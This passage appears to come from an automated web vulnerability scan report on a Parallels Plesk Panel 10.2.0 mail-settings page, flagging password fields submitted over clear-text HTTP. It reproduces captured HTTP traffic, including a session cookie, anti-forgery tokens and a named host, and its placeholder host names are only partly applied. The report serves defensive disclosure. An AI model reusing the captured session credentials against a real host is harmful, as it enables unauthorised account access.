<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4 (the form's action attribute in the response below is empty, so it posts back to the requested URL)

The form contains the following password fields:

general[generalSection][password]
general[generalSection][passwordConfirmation]

Request

GET /smb/email-address/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:52:19 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:52:19 GMT
Connection: close
Content-Length: 38577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>format-2@vulnerable.host.fqdn - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fedit%2Fid%2F4' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-2@vulnerable.host.fqdn</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="format-2" class="input-text" />@vulnerable.host.fqdn </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>Nobody</span>

</div>
</div>
</div>
<div id='general-generalSection-password-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][password]" id="general-generalSection-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">This password will be used if e-mail address is not assigned to a user account. E-mail addresses assigned to user accounts operate with user account passwords.</span>
</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-generalSection-password');
new Jsw.PasswordMeter({
renderTo: 'general-generalSection-password',
renderMode: 'after',
observe: 'general-generalSection-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-generalSection-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][passwordConfirmation]" id="general-generalSection-passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

